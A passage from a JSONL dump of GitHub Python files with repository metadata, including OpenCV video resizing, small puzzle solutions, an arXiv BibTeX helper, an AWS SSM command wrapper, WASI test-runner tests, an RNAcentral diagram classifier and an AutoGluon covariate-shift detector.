collections\nif sys.version_info < (3, 3):\n Iterable = collections.Iterable\nelse:\n Iterable = collections.abc.Iterable\n\nimport cv2\nimport numpy as np\n\nfrom .blob import _is_varray\n\ndef resize(varray, size, interpolation=cv2.INTER_LINEAR):\n \"\"\"resize a video via OpenCV\"s resize API\n NOTE: Currently, we only support spatial resize.\n \"\"\"\n if not _is_varray(varray):\n raise TypeError('varray should be ndarray. 
Got {}'.format(varray))\n t, h, w, c = varray.shape\n\n oh = None\n ow = None\n if isinstance(size, int):\n ## short path\n if (w <= h and w == size) or (h <= w and h == size):\n return varray \n if w < h:\n ow = size\n oh = int(size * h / w)\n else:\n oh = size\n ow = int(size * w / h)\n elif isinstance(size, Iterable) and (len(size) == 2):\n oh, ow = tuple(size)\n else:\n raise TypeError(\"Invalid size {}\".format(size))\n\n _shape = (t, oh, ow, c)\n result = np.empty(_shape, dtype=np.uint8)\n for _i in range(t):\n farray = varray[_i, :, :, :]\n farray = cv2.resize(farray, dsize=(ow, oh),\n interpolation=interpolation)\n result[_i, :, :, :] = farray\n return result\n","repo_name":"SaltedFishLZ/torchstream","sub_path":"torchstream/transforms/functional/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"28902626661","text":"#!/usr/bin/python3\n\nimport sys\nimport string\nimport itertools\nimport pickle\n\nfrom helper import classify\n\n\nif len(sys.argv) == 1:\n print(\"Usage: python \" + sys.argv[0] + \" letters num\")\n print(\"E.g: python \" + sys.argv[0] + \" apelp 4\")\n exit(0)\n\nmapping = pickle.load(open(\"words_mapping.p\", \"rb\"))\n\ncombinations = map(''.join, list(\n itertools.combinations(sys.argv[1], int(sys.argv[2]))))\n\nanswer = set()\nfor combo in combinations:\n category = classify(combo)\n if category in mapping:\n for word in mapping[category]:\n answer.add(word)\nprint(sorted(list(answer)))\n","repo_name":"fredwangwang/solve-word-cookies","sub_path":"test_words.py","file_name":"test_words.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18357132799","text":"from collections import Counter\n\nn = int(input())\nS = [''.join(sorted(input())) for _ in range(n)]\nS_c = Counter(S)\n\nans = 0\nfor i in list(S_c.values()):\n ans += i * (i - 1) // 2\n\nprint(ans)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02947/s947659341.py","file_name":"s947659341.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18064571089","text":"s = input()\nli = [[1, 1, 0, 0], [0, 0, 1, 1], [1, 1, 1, 1]]\n\ndirection = [0] * 4\n\nfor i in s:\n if i == 'N':\n direction[0] = 1\n elif i == 'S':\n direction[1] = 1\n elif i == 'W':\n direction[2] = 1\n else:\n direction[3] = 1\n\nif direction in li:\n print('Yes')\nelse:\n print('No')","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p04019/s549129239.py","file_name":"s549129239.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"23192571807","text":"from __future__ import unicode_literals, print_function, absolute_import\nfrom builtins import input\nimport feedparser\nfrom doi2bib.crossref import get_bib_from_doi\nfrom bibtexparser.bwriter import BibTexWriter\nfrom bibtexparser.bibdatabase import BibDatabase\ntry:\n from urllib import quote\nexcept ImportError:\n from urllib.parse import quote\nimport re\nfrom unidecode import unidecode\n\nimport requests\nfrom arxivcheck.wrapper_graphQL import *\n\nmonths = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct',\n'nov', 'dec']\n\n\ndef ask_which_is(title, items):\n found = False\n result = {}\n question = 
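# --- Added aside (mine) on the Counter-of-sorted-strings solution above:
# sorting gives a canonical form, so two strings are anagrams iff their
# sorted forms match, and a group of k equal forms contributes k*(k-1)//2
# pairs. A tiny brute-force cross-check with made-up words:
from collections import Counter
from itertools import combinations

words = ["acornistnt", "peanutbomb", "constraint"]
canon = Counter("".join(sorted(w)) for w in words)
by_formula = sum(k * (k - 1) // 2 for k in canon.values())
brute = sum(1 for a, b in combinations(words, 2) if sorted(a) == sorted(b))
assert by_formula == brute == 1  # only "acornistnt"/"constraint" pair up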
\"\\n\\tArxiv:{} \\n\\tIt is \\n\\t{}\\n\\t Correct?y(yes)|n(no)|q(quit)\"\n for item in items:\n w = input(question.format(\n unidecode(item[\"title\"]), unidecode(title)))\n if w == \"y\":\n found = True\n result = item\n break\n if w == \"q\":\n break\n return found, result\n\n\ndef get_arxiv_info(value, field=\"id\"):\n \n result = arxiv_info(value, field)\n\n found = False\n items = []\n\n if field == \"id\" and result[\"data\"][\"entry\"] != None:\n items = result[\"data\"][\"entry\"]\n found = True\n elif field == \"ti\" and result[\"data\"][\"entries\"]:\n items = result[\"data\"][\"entries\"]\n found = True\n else:\n items = [] \n\n\n return found, items\n\n\ndef generate_bib_from_arxiv(arxiv_item, value, field=\"id\"):\n # arxiv_cat = arxiv_item.arxiv_primary_category[\"term\"]\n if field == \"ti\":\n journal = \"arxiv:\"+arxiv_item[\"id\"].split(\"http://arxiv.org/abs/\")[1]\n else:\n journal = \"arxiv:\"+value\n\n url = arxiv_item[\"pdfUrl\"]\n title = arxiv_item[\"title\"]\n authors = arxiv_item[\"authors\"]\n if len(authors) > 0:\n first_author = authors[0].split(\" \")\n authors = \" and \".join([author for author in authors])\n else:\n first_author = authors\n authors = authors\n\n published = arxiv_item[\"published\"].split(\"-\")\n year = ''\n if len(published) > 1:\n year = published[0]\n bib = BibDatabase()\n bib.entries = [\n {\n \"journal\": journal,\n \"url\": url,\n \"ID\": year+first_author[0]+journal,\n \"title\": title,\n \"year\": year,\n \"author\": authors,\n \"ENTRYTYPE\": \"article\"\n }\n ]\n bib = BibTexWriter().write(bib)\n return bib\n\n\ndef get_arxiv_pdf_link(value, field=\"id\"):\n found, items = get_arxiv_info(value, field)\n if found:\n link = items[0][\"pdfUrl\"]\n\n return found, link\n\n\ndef check_arxiv_published(value, field=\"id\", get_first=True):\n found = False\n published = False\n bib = \"\"\n value = re.sub(\"arxiv\\:\", \"\", value, flags=re.I)\n found, items = get_arxiv_info(value, field)\n if found:\n if get_first is False and field == \"ti\" and len(items) > 1:\n found, item = ask_which_is(value, items)\n else:\n item = items[0]\n if found:\n if item[\"doi\"] != None:\n doi = item[\"doi\"]\n published, bib = get_bib_from_doi(doi)\n else:\n bib = generate_bib_from_arxiv(item, value, field)\n else:\n print(\"\\t\\nArxiv not found.\")\n return found, published, bib\n","repo_name":"gleisonbt/migrating-to-graphql","sub_path":"migration_study/arxivcheck/arxivcheck/arxiv.py","file_name":"arxiv.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"16910659776","text":"from smsh.target.target import Target\nfrom smsh import clients\n\n\nclass Instance(Target):\n DEFAULT_EXECUTION_TIMEOUT = \"900\"\n DEFAULT_DOCUMENT = \"AWS-RunShellScript\"\n\n def __init__(self, instance_id):\n Target.__init__(self, instance_id)\n\n def send_command(self, wd, command):\n client = clients.SSM()\n resp = client.send_command(\n InstanceIds=[\n self.get_instance_id()\n ],\n DocumentName=self.DEFAULT_DOCUMENT,\n Parameters={\n \"workingDirectory\": [wd],\n \"commands\": [command],\n \"executionTimeout\": [self.DEFAULT_EXECUTION_TIMEOUT]\n }\n )\n return resp.get(\"Command\", {}).get(\"CommandId\")\n","repo_name":"mnesbitt/smsh","sub_path":"smsh/target/instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"13094520933","text":"from 
typing import Any\nfrom unittest.mock import ANY, MagicMock, Mock, patch, mock_open\n\nimport wasi_test_runner.test_case as tc\nimport wasi_test_runner.test_suite_runner as tsr\n\n\ndef get_mock_open() -> Mock:\n def open_mock(filename: str, *_args: Any, **_kwargs: Any) -> Any:\n file_content = {\n \"my-path/manifest.json\": '{\"name\": \"test-suite\"}',\n \"test1.json\": '{\"dirs\": [\".\", \"deep/dir\"]}',\n \"test2.json\": '{\"exit_code\": 1, \"args\": [\"a\", \"b\"]}',\n \"test3.json\": '{\"stdout\": \"output\", \"env\": {\"x\": \"1\"}}',\n }\n if filename in file_content:\n return mock_open(read_data=file_content[filename]).return_value\n\n raise FileNotFoundError(f\"(mock) Unable to open {filename}\")\n\n return MagicMock(side_effect=open_mock)\n\n\n# pylint: disable-msg=too-many-locals\n@patch(\"builtins.open\", get_mock_open())\n@patch(\"os.path.exists\", Mock(return_value=True))\ndef test_runner_end_to_end() -> None:\n test_paths = [\"test1.wasm\", \"test2.wasm\", \"test3.wasm\"]\n\n failures = [tc.Failure(\"a\", \"b\"), tc.Failure(\"x\", \"y\"), tc.Failure(\"x\", \"z\")]\n\n outputs = [\n tc.Output(0, \"test1\", \"\"),\n tc.Output(1, \"test2\", \"\"),\n tc.Output(2, \"test3\", \"\"),\n ]\n expected_results = [\n tc.Result(outputs[0], True, []),\n tc.Result(outputs[1], True, [failures[1]]),\n tc.Result(outputs[2], True, [failures[0], failures[2]]),\n ]\n expected_config = [\n tc.Config(dirs=[\".\", \"deep/dir\"]),\n tc.Config(args=[\"a\", \"b\"], exit_code=1),\n tc.Config(stdout=\"output\", env={\"x\": \"1\"}),\n ]\n\n expected_test_cases = [\n tc.TestCase(test_name, config, result, ANY)\n for config, test_name, result in zip(\n expected_config, [\"test1\", \"test2\", \"test3\"], expected_results\n )\n ]\n\n runtime = Mock()\n runtime.run_test.side_effect = outputs\n\n validators = [\n Mock(side_effect=[None, None, failures[0]]),\n Mock(side_effect=[None, failures[1], failures[2]]),\n ]\n\n reporters = [Mock(), Mock()]\n\n filt = Mock()\n filt.should_skip.return_value = (False, None)\n filters = [filt]\n\n with patch(\"glob.glob\", return_value=test_paths):\n suite = tsr.run_tests_from_test_suite(\"my-path\", runtime, validators, reporters, filters) # type: ignore\n\n # Assert manifest was read correctly\n assert suite.name == \"test-suite\"\n\n # Assert test cases\n assert suite.test_count == 3\n assert suite.test_cases == expected_test_cases\n\n # Assert test runner calls\n assert runtime.run_test.call_count == 3\n for test_path, config in zip(test_paths, expected_config):\n runtime.run_test.assert_any_call(\n test_path, config.args, config.env, config.dirs\n )\n\n # Assert reporters calls\n for reporter in reporters:\n assert reporter.report_test.call_count == 3\n for test_case in expected_test_cases:\n reporter.report_test.assert_any_call(test_case)\n\n # Assert validators calls\n for validator in validators:\n assert validator.call_count == 3\n for config, output in zip(expected_config, outputs):\n validator.assert_any_call(config, output)\n\n # Assert filter calls\n for filt in filters:\n assert filt.should_skip.call_count == 3\n for test_case in expected_test_cases:\n filt.should_skip.assert_any_call(suite.name, test_case.name)\n\n\n@patch(\"os.path.exists\", Mock(return_value=False))\ndef test_runner_should_use_path_for_name_if_manifest_does_not_exist() -> None:\n suite = tsr.run_tests_from_test_suite(\"my-path\", Mock(), [], [], [])\n\n assert suite.name == 
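# --- Added aside (mine): the get_mock_open pattern above in miniature --
# a side_effect routes open() by filename to canned contents while any other
# path still raises, which keeps the failure mode realistic.
from unittest.mock import MagicMock, mock_open, patch

files = {"cfg.json": '{"ok": true}'}

def fake_open(name, *args, **kwargs):
    if name in files:
        return mock_open(read_data=files[name]).return_value
    raise FileNotFoundError(f"(mock) Unable to open {name}")

with patch("builtins.open", MagicMock(side_effect=fake_open)):
    assert open("cfg.json").read() == '{"ok": true}'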
\"my-path\"\n","repo_name":"WebAssembly/wasi-testsuite","sub_path":"test-runner/tests/test_test_suite_runner.py","file_name":"test_test_suite_runner.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"65"} +{"seq_id":"11047177930","text":"import csv\nimport enum\nimport logging\nimport typing as ty\nfrom pathlib import Path\n\nimport joblib\nimport pandas as pd\nimport psycopg2\nimport psycopg2.extras\nfrom more_itertools import chunked\nfrom pypika import Query, Table\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score, train_test_split\n\nLOGGER = logging.getLogger(__name__)\n\n\nSOURCE_MAP = {\n \"crw\": 0,\n \"ribovision\": 1,\n \"gtrnadb\": 2,\n \"rnase_p\": 3,\n \"rfam\": 4,\n}\n\n\n@enum.unique\nclass Attributes(enum.Enum):\n SourceIndex = \"source_index\"\n SequenceLength = \"sequence_length\"\n DiagramSequenceLength = \"diagram_sequence_length\"\n ModelLength = \"model_length\"\n ModelBasepairCount = \"model_basepair_count\"\n DiagramBps = \"diagram_bps\"\n DiagramModelLength = \"diagram_model_length\"\n DiagramOverlapCount = \"diagram_overlap_count\"\n\n @classmethod\n def model_columns(cls) -> ty.List[str]:\n return [attr.column_name() for attr in cls]\n\n def column_name(self) -> str:\n return self.value\n\n\nMODEL_COLUMNS: ty.List[str] = Attributes.model_columns()\n\n\ndef chunked_query(\n ids: ty.Iterable[str], query_builder, db_url: str, chunk_size=100\n) -> ty.Iterable[ty.Dict[str, ty.Any]]:\n conn = psycopg2.connect(db_url)\n for chunk in chunked(ids, chunk_size):\n sql = str(query_builder(chunk))\n with conn.cursor(cursor_factory=psycopg2.extras.DictCursor) as cur:\n cur.execute(sql)\n for result in cur:\n yield dict(result)\n\n\ndef fetch_modeled_data(\n all_ids: ty.Iterable[str], db_url: str, chunk_size=100\n) -> ty.Iterable[ty.Dict[str, ty.Any]]:\n rna = Table(\"rna\")\n ss = Table(\"rnc_secondary_structure_layout\")\n sm = Table(\"rnc_secondary_structure_layout_models\")\n\n def build_query(ids):\n return (\n Query.from_(rna)\n .select(\n rna.upi.as_(\"urs\"),\n rna.len.as_(\"sequence_length\"),\n sm.model_source,\n ss.sequence_start.as_(\"diagram_sequence_start\"),\n ss.sequence_stop.as_(\"diagram_sequence_stop\"),\n ss.basepair_count.as_(\"diagram_bps\"),\n ss.model_start.as_(\"diagram_model_start\"),\n ss.model_stop.as_(\"diagram_model_stop\"),\n sm.model_length,\n sm.model_basepair_count,\n ss.overlap_count.as_(\"diagram_overlap_count\"),\n )\n .join(ss)\n .on(ss.urs == rna.upi)\n .join(sm)\n .on(sm.id == ss.model_id)\n .where(ss.urs.isin(ids))\n )\n\n seen: ty.Set[str] = set()\n results = chunked_query(all_ids, build_query, db_url, chunk_size=chunk_size)\n for result in results:\n if any(v is None for v in result.values()):\n continue\n yield result\n seen.add(result[\"urs\"])\n\n for urs in all_ids:\n if urs not in seen:\n LOGGER.warn(\"Missed loading %s\", urs)\n\n\ndef infer_columns(frame: pd.DataFrame):\n frame[\"diagram_sequence_length\"] = (\n frame[\"diagram_sequence_stop\"] - frame[\"diagram_sequence_start\"]\n )\n frame[\"diagram_model_length\"] = (\n frame[\"diagram_model_stop\"] - frame[\"diagram_model_start\"]\n )\n frame[\"source_index\"] = frame.model_source.map(SOURCE_MAP)\n if frame[\"source_index\"].isnull().any():\n raise ValueError(\"Could not build source_index for all training data\")\n\n\ndef fetch_training_data(handle: ty.IO, db_url: str) -> pd.DataFrame:\n ids = []\n training = {}\n for (urs, flag) 
in csv.reader(handle):\n ids.append(urs)\n if flag == \"1\":\n training[urs] = True\n elif flag == \"0\":\n training[urs] = False\n else:\n raise ValueError(f\"Unknown flag {flag}\")\n\n filled = []\n for metadata in fetch_modeled_data(ids, db_url):\n urs = metadata[\"urs\"]\n if urs not in training:\n raise ValueError(f\"Got an extra entry, somehow {metadata}\")\n metadata[\"valid\"] = training[urs]\n filled.append(metadata)\n\n training = pd.DataFrame.from_records(filled)\n infer_columns(training)\n return training\n\n\ndef train(handle, db_url, cross_validation=5, test_size=0.4) -> RandomForestClassifier:\n data = fetch_training_data(handle, db_url)\n X_train, X_test, y_train, y_test = train_test_split(\n data[MODEL_COLUMNS].to_numpy(), data[\"valid\"].to_numpy(), test_size=test_size\n )\n\n clf = RandomForestClassifier(min_samples_split=5)\n scores = cross_val_score(clf, X_train, y_train, cv=cross_validation)\n LOGGER.info(\"%s fold cross validation scores: %s\", cross_validation, scores)\n clf.fit(X_train, y_train)\n LOGGER.info(\"Test data (%f) scoring %s\", test_size, clf.score(X_test, y_test))\n return clf\n\n\ndef from_result(clf, result) -> bool:\n predictable = {}\n for attribute in Attributes:\n value = attribute.r2dt_result_value(result)\n predictable[attribute.column_name()] = [value]\n predictable = pd.DataFrame.from_records(predictable)\n return clf.predict(predictable)[0]\n\n\ndef write(model_path: Path, handle: ty.IO, db_url: str, output: ty.IO):\n model = joblib.load(model_path)\n ids = [r[0] for r in csv.reader(handle)]\n modeled = fetch_modeled_data(ids, db_url)\n frame = pd.DataFrame.from_records(modeled)\n if len(frame) > 0:\n infer_columns(frame)\n predicted = model.predict(frame[MODEL_COLUMNS].to_numpy())\n to_write = pd.DataFrame()\n to_write[\"urs\"] = frame[\"urs\"]\n to_write[\"should_show\"] = predicted.astype(int)\n to_write.to_csv(output, index=False)\n\n\ndef write_model(handle: ty.IO, db_url: str, output: Path):\n joblib.dump(train(handle, db_url), output)\n\n\ndef write_training_data(handle: ty.IO, db_url: str, output: ty.IO):\n ids = []\n for row in csv.reader(handle):\n ids.append(row[0])\n modeled = list(fetch_modeled_data(ids, db_url))\n writer = csv.DictWriter(output, fieldnames=modeled[0].keys())\n writer.writeheader()\n writer.writerows(modeled)\n\n\ndef convert_sheet(handle: ty.IO, output: ty.IO):\n converted = []\n for row in csv.DictReader(handle):\n urs = row[\"urs\"]\n raw_should_show = row[\"Labeled Should show\"]\n if not raw_should_show:\n LOGGER.info(\"No value for %s\", urs)\n\n should_show = None\n raw_should_show = raw_should_show.lower()\n if raw_should_show == \"true\":\n should_show = \"1\"\n elif raw_should_show == \"false\":\n should_show = \"0\"\n else:\n LOGGER.warn(\"Unknown should show in %s\", row)\n continue\n converted.append((urs, should_show))\n converted.sort(key=lambda r: r[0])\n writer = csv.writer(output)\n writer.writerows(converted)\n\n\ndef inspect_data(data, db_url: str) -> ty.Iterable[ty.Dict[str, ty.Any]]:\n def build_query(ids):\n ss = Table(\"rnc_secondary_structure_layout\")\n sm = Table(\"rnc_secondary_structure_layout_models\")\n pre = Table(\"rnc_rna_precomputed\")\n return (\n Query.from_(ss)\n .join(sm)\n .on(sm.id == ss.model_id)\n .join(pre)\n .on(pre.urs == sm.urs)\n .select(\n sm.model_source,\n sm.model_name,\n sm.model_so_term,\n )\n .where(ss.urs.isin(ids))\n .where(pre.taxid.isnotnull)\n )\n\n mapping = {d[0]: d for d in data}\n seen: ty.Set[str] = set()\n results = chunked_query(data, 
build_query, db_url)\n for result in results:\n if any(v is None for v in result.values()):\n continue\n yield {\n \"urs\": result[\"urs\"],\n \"link\": f\"https://rnacentral.org/rna/{result['urs']}\",\n \"model_source\": result[\"model_source\"],\n \"model_name\": result[\"model_name\"],\n \"model_so_term\": result[\"model_so_term\"],\n \"Labeled Should show\": result[\"urs\"],\n }\n seen.add(result[\"urs\"])\n\n for urs in mapping.keys():\n if urs not in seen:\n LOGGER.warn(\"Missed loading %s\", urs)\n\n\ndef write_inspect_data(handle: ty.IO, db_url: str, output: ty.IO):\n data = list(csv.reader(handle))\n inspect = list(inspect_data(data, db_url))\n writer = csv.DictWriter(output, fieldnames=inspect[0].keys())\n writer.writeheader()\n writer.writerows(inspect)\n","repo_name":"RNAcentral/rnacentral-import-pipeline","sub_path":"rnacentral_pipeline/rnacentral/r2dt/should_show.py","file_name":"should_show.py","file_ext":"py","file_size_in_byte":8381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"71343314767","text":"from typing import Union, List, Any, Optional\nimport warnings\nimport pandas as pd\nimport numpy as np\nfrom autogluon.core.metrics import balanced_accuracy, BINARY_METRICS\nfrom autogluon.tabular import TabularPredictor\nfrom .. import AnalysisState\nfrom .base import AbstractAnalysis\n\n\ndef post_fit(func):\n \"\"\"decorator for post-fit methods\"\"\"\n\n def pff_wrapper(self, *args, **kwargs):\n assert self._is_fit, f'.fit needs to be called prior to .{func.__name__}'\n return func(self, *args, **kwargs)\n\n return pff_wrapper\n\nclass Classifier2ST:\n \"\"\"A classifier 2 sample test, which tests for a difference between a source and target dataset. It fits a\n classifier to predict if a sample is in the source and target dataset, then computes an evaluation metric on a\n holdout which becomes the test statistic.\n\n Parameters\n ----------\n classifier_class : an AutoGluon predictor, such as autogluon.tabular.TabularPredictor\n The predictor (classifier) class to classify the source from target dataset, predictor class needs to support\n binary classification\n sample_label : str, default = 'xshift_label'\n The label that will be used to indicate if the sample is from training or test\n eval_metric : callable, default = autogluon.core.metrics.balanced_accuracy\n Binary classification metric to use for the classifier 2 sample test\n split : float, default = 0.5\n Training/test split proportion for classifier 2 sample test\n classifier_kwargs : dict, default = {}\n The kwargs passed to the classifier, a member of classifier_class\n \"\"\"\n def __init__(self,\n classifier_class,\n sample_label='xshift_label',\n eval_metric=balanced_accuracy,\n split=0.5,\n compute_fi = True,\n classifier_kwargs = {}\n ):\n classifier_kwargs.update({'label': sample_label, 'eval_metric': eval_metric})\n self.classifier = classifier_class(**classifier_kwargs)\n self.classifier_class = classifier_class\n self.split = split\n self.sample_label = sample_label\n self.eval_metric = eval_metric\n self._is_fit = False\n self._test = None\n self.test_stat = None\n self.has_fi = None\n self.compute_fi = compute_fi\n\n @staticmethod\n def _make_source_target_label(data, sample_label):\n \"\"\"Turn a source, target pair into a single dataframe with label column\"\"\"\n source, target = data[0].copy(), data[1].copy()\n source.loc[:,sample_label] = 0\n target.loc[:,sample_label] = 1\n data = pd.concat((source, target))\n return data\n\n def 
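# --- Added sketch (mine) of the chunked-IN-query pattern used by
# chunked_query above, with the SQL merely rendered instead of executed;
# it relies on the same pypika and more_itertools imports as the module.
from more_itertools import chunked
from pypika import Query, Table

def build(ids):
    t = Table("rnc_secondary_structure_layout")
    return Query.from_(t).select(t.urs).where(t.urs.isin(ids))

ids = [f"URS{i:010d}" for i in range(250)]
sqls = [str(build(chunk)) for chunk in chunked(ids, 100)]
assert len(sqls) == 3  # 250 ids -> chunks of 100, 100, 50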
fit(self, data, **kwargs):\n \"\"\"Fit the classifier for predicting if source or target and compute the 2-sample test statistic.\n\n Parameters\n ----------\n data : pd.DataFrame, or tuple\n either\n - a dataframe with a label column where 1 = target and 0 = source\n - a tuple of source dataframe and target dataframe\n \"\"\"\n if isinstance(data, pd.DataFrame):\n sample_label = self.sample_label\n assert sample_label in data.columns, \"sample_label needs to be a column of data\"\n assert self.split, \"sample_label requires the split parameter\"\n data = data.copy() # makes a copy\n else:\n assert len(data) == 2, \"Data needs to be tuple/list of (source, target) if sample_label is None\"\n data = self._make_source_target_label(data, self.sample_label) # makes a copy\n if data.index.has_duplicates:\n data.index = pd.RangeIndex(data.shape[0])\n train = data.sample(frac=self.split)\n test = data.drop(train.index)\n self.classifier.fit(train, **kwargs)\n yhat = self.classifier.predict(test)\n self.test_stat = self.eval_metric(test[self.sample_label], yhat)\n self.has_fi = (getattr(self.classifier, \"feature_importance\", None) is not None)\n if self.has_fi and self.compute_fi:\n self._test = test # for feature importance\n self._is_fit = True\n\n @post_fit\n def _pvalue_half_permutation(self,\n num_permutations=1000):\n \"\"\"The half permutation method for computing p-values.\n See Section 9.1 of https://arxiv.org/pdf/1602.02210.pdf\n \"\"\"\n perm_stats = [self.test_stat]\n yhat = self.classifier.predict(self._test)\n for i in range(num_permutations):\n perm_yhat = np.random.permutation(yhat)\n perm_test_stat = self.eval_metric(\n self._test[self.sample_label],\n perm_yhat\n )\n perm_stats.append(perm_test_stat)\n pval = (self.test_stat <= np.array(perm_stats)).mean()\n return pval\n\n @post_fit\n def pvalue(self,\n num_permutations: int=1000):\n \"\"\"Compute the p-value which measures the significance level for the test statistic\n\n Parameters\n ----------\n num_permutations: int, default = 1000\n The number of permutations used for any permutation based method\n\n Returns\n -------\n float of the p-value for the 2-sample test\n \"\"\"\n pval = self._pvalue_half_permutation(num_permutations=num_permutations)\n return pval\n\n @post_fit\n def feature_importance(self):\n \"\"\"Returns the feature importances for the trained classifier for source v. target\n\n Returns\n -------\n pd.DataFrame of feature importances\n \"\"\"\n assert self.has_fi, \"Classifier class does not have feature_importance method\"\n assert self.compute_fi, \"Set compute_fi to True to compute feature importances\"\n fi_scores = self.classifier.feature_importance(self._test)\n return fi_scores\n\n\nclass C2STShiftDetector:\n \"\"\"Detect a change in covariate (X) distribution between training and test, which we call XShift. It can tell you\n if your training set is not representative of your test set distribution. 
This is done with a Classifier 2\n Sample Test.\n\n Parameters\n ----------\n classifier_class : an AutoGluon predictor, such as autogluon.tabular.TabularPredictor\n The predictor that will be fit on training set and predict the test set\n label : str, default = None\n The Y variable that is to be predicted (if it appears in the train/test data then it will be removed)\n compute_fi : bool, default = True\n To compute the feature importances set to True, this can be computationally intensive\n pvalue_thresh : float, default = 0.01\n The threshold for the pvalue\n eval_metric : str, default = 'balanced_accuracy'\n The metric used for the C2ST, it must be one of the binary metrics from autogluon.core.metrics\n sample_label : str, default = 'i2vkyc0p64'\n The label internally used for the classifier 2 sample test, the only reason to change it is in the off chance\n that the default value is a column in the data.\n classifier_kwargs : dict, default = {}\n The kwargs passed to the classifier, a member of classifier_class\n\n Methods\n -------\n fit : fits the detector on training and test covariate data\n results: outputs the results of XShift detection\n - test statistic\n - detection status\n - p-value\n - detector feature importances\n decision: decision function ('detected' or 'not detected')\n pvalue: a p-value for the two sample test\n\n Usage\n -----\n >>> xshiftd = C2STShiftDetector(TabularPredictor, label='class')\n Fit the detector...\n >>> xshiftd.fit(X, X_test)\n Output the decision...\n >>> xshiftd.decision()\n Output the results...\n >>> xshiftd.results()\n \"\"\"\n\n def __init__(self,\n classifier_class: Any,\n label: Optional[str]=None,\n compute_fi: bool = True,\n pvalue_thresh : float = 0.01,\n eval_metric: str='balanced_accuracy',\n sample_label: str='i2vkyc0p64',\n classifier_kwargs: dict={}):\n named_metrics = BINARY_METRICS\n assert eval_metric in named_metrics.keys(), \\\n 'eval_metric must be one of [' + ', '.join(named_metrics.keys()) + ']'\n self.eval_metric = named_metrics[eval_metric]\n self.C2ST = Classifier2ST(classifier_class,\n sample_label=sample_label,\n eval_metric=self.eval_metric,\n compute_fi = compute_fi,\n classifier_kwargs=classifier_kwargs)\n if not label:\n warnings.warn('label is not specified, please ensure that train_data, test_data do not have the Y (label) '\n 'variable')\n self.label = label\n self._is_fit = False\n self.fi_scores = None\n self.compute_fi = compute_fi\n self.pvalue_thresh = pvalue_thresh\n\n @post_fit\n def _calculate_pvalue(self,\n num_permutations: int=1000) -> float:\n \"\"\"Compute the p-value which measures the significance level for the test statistic\n\n Parameters\n ----------\n num_permutations: int, default=1000\n The number of permutations used for any permutation based method\n\n Returns\n -------\n float of the p-value for the 2-sample test\n \"\"\"\n return self.C2ST.pvalue(num_permutations=num_permutations)\n\n\n def fit(self,\n X: pd.DataFrame,\n X_test: pd.DataFrame,\n pvalue_permutations: int=1000,\n **kwargs):\n \"\"\"Fit the XShift detector.\n\n Parameters\n ----------\n X : pd.DataFrame\n Training dataframe\n X_test : pd.DataFrame\n Test dataframe\n pvalue_permutations: int, default=1000\n The number of permutations used for pvalue calculation\n **kwargs (optional): keyword arguments to .fit() for the classifier_class\n \"\"\"\n assert self.C2ST.sample_label not in X.columns, \\\n f'your data columns contain {self.C2ST.sample_label} which is used internally'\n\n if self.label:\n if self.label in X.columns:\n 
X = X.drop(columns=[self.label])\n            if self.label in X_test.columns:\n                X_test = X_test.drop(columns=[self.label])\n\n        self.C2ST.fit((X, X_test), **kwargs)\n\n        # Feature importance\n        if self.C2ST.has_fi and self.compute_fi:\n            self.fi_scores = self.C2ST.feature_importance()\n\n        self._is_fit = True\n        self._X_test = X_test\n        self.pvalue = self._calculate_pvalue(num_permutations=pvalue_permutations)\n\n    @post_fit\n    def decision(self) -> str:\n        \"\"\"Decision function for testing XShift. Uncertainty quantification is currently not supported. Fit must be\n        called prior to running.\n\n        Returns\n        -------\n        One of ['detected', 'not_detected']\n        \"\"\"\n        # default teststat_thresh by metric\n        if self.pvalue < self.pvalue_thresh:\n            return 'detected'\n        else:\n            return 'not_detected'\n\n    @post_fit\n    def results(self) -> dict:\n        \"\"\"Output the results of the C2ST in dictionary\n\n        Returns\n        -------\n        dict of\n          - `detection_status`: One of ['detected', 'not_detected']\n          - `test_statistic`: the C2ST statistic\n          - 'pvalue': the p-value using permutation test\n          - 'pvalue_threshold': the decision p-value threshold\n          - `feature_importance`: the feature importance dataframe, if computed\n        \"\"\"\n        det_status = self.decision()\n        res_json = {\n            'detection_status': det_status,\n            'test_statistic': self.C2ST.test_stat,\n            'pvalue': self.pvalue,\n            'pvalue_threshold': self.pvalue_thresh,\n            'eval_metric': self.eval_metric.name,\n        }\n        if self.fi_scores is not None:\n            res_json['feature_importance'] = self.fi_scores\n        return res_json\n\n\nclass XShiftDetector(AbstractAnalysis):\n    \"\"\"Detect a change in covariate (X) distribution between training and test, which we call XShift. It can tell you\n    if your training set is not representative of your test set distribution. This is done with a Classifier 2\n    Sample Test.\n    \"\"\"\n\n    def __init__(self,\n                 classifier_class: Union[Any,None] = TabularPredictor,\n                 compute_fi: bool = True,\n                 classifier_kwargs: dict = {},\n                 parent: Union[None,AbstractAnalysis] = None,\n                 children: List[AbstractAnalysis] = [],\n                 **kwargs) -> None:\n        super().__init__(parent, children, **kwargs)\n        self.classifier_kwargs = classifier_kwargs\n        self.classifier_class = classifier_class\n        self.compute_fi = compute_fi\n\n    def _fit(self, state: AnalysisState, args: AnalysisState, **fit_kwargs):\n        # where to put path?\n        # how to 